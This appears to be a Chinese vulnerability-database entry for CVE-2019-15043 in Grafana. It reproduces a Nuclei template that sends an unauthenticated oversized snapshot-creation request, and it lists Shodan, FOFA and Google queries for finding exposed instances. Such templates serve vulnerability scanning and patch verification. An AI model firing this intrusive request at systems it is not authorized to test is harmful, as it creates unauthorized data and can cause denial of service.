CVE-2019-15043: Grafana - Improper Access Control

日期: 2025-08-01 | 影响软件: Grafana | POC: 已公开

漏洞描述

Grafana 2.x through 6.x before 6.3.4 is susceptible to improper access control. An attacker can delete and create arbitrary snapshots, leading to denial of service.

PoC代码[已公开]

id: CVE-2019-15043

info:
  name: Grafana - Improper Access Control
  author: Joshua Rogers
  severity: high
  description: |
    Grafana 2.x through 6.x before 6.3.4 is susceptible to improper access control. An attacker can delete and create arbitrary snapshots, leading to denial of service.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to gain unauthorized access to sensitive information or perform unauthorized actions.
  remediation: Upgrade to 6.3.4 or higher.
  reference:
    - https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569
    - https://grafana.com/blog/2019/08/29/grafana-5.4.5-and-6.3.4-released-with-important-security-fix/
    - https://bugzilla.redhat.com/show_bug.cgi?id=1746945
    - https://aaron-hoffmann.com/posts/cve-2019-15043/
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15043
    - https://nvd.nist.gov/vuln/detail/CVE-2019-15043
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
    cvss-score: 7.5
    cve-id: CVE-2019-15043
    cwe-id: CWE-306
    epss-score: 0.9085
    epss-percentile: 0.99614
    cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: grafana
    product: grafana
    shodan-query:
      - title:"Grafana"
      - cpe:"cpe:2.3:a:grafana:grafana"
      - http.title:"grafana"
    fofa-query:
      - title="grafana"
      - app="grafana"
    google-query: intitle:"grafana"
  tags: cve,cve2019,grafana,dos,intrusive
variables:
  payload: '{{repeat("A", 4000)}}'

http:
  - method: POST
    path:
      - "{{BaseURL}}/api/snapshots"

    body: '{"dashboard": {"name":"{{payload}}"}}'

    headers:
      Content-Type: "application/json"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"deleteUrl":'
          - '"deleteKey":'
          - '"key":'
          - '"url":'
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022058daa38ba43dbdf7b323871d95c76f4632162d4e5a85b3fd757455b233a589b5022100a902cb46e63906fe9d8c1ee4796c52bf4b18ab265e8f7810e65d5c62247c7ee4:922c64590222798bb761d5b6d8e72950

相关漏洞推荐